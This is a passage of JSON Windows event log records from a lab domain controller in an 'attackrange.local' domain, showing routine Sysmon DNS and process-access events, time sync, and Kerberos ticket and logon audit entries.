05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2589,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.319\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::10bc:13e3:f5ff:fef1;2001:0:34f1:8072:10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.319","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::10bc:13e3:f5ff:fef1;2001:0:34f1:8072:10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2590,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.423\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: ifevwxojp\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.423","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"ifevwxojp","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76831,"ProcessID":1224,"ThreadID":1360,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 05:47:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2591,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.424\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.424","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:11","Hostname":"win-dc-881393.attackrange.local","Keywords":4611686018695823360,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1014,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"Task":1014,"OpcodeValue":0,"RecordNumber":76832,"ProcessID":1332,"ThreadID":2260,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Name resolution for the name attackrange.local timed out after none of the configured DNS servers responded.","Opcode":"Info","QueryName":"attackrange.local","AddressLength":"128","Address":"1700000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","EventReceivedTime":"2020-08-01 05:47:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2592,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.443\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nProcessId: 1144\r\nQueryName: isatap.us-east-2.compute.internal\r\nQueryStatus: 9003\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.443","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","QueryName":"isatap.us-east-2.compute.internal","QueryStatus":"9003","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2593,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:11.094\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: win-dc-881393\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:11.094","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"win-dc-881393","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220380,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{557CDD29-3D05-7C13-A843-635BED52B3AC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40800000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40800000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{557CDD29-3D05-7C13-A843-635BED52B3AC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220381,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A9EA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4a9ea","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220382,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4A9EA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t49701\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4a9ea","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"49701","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 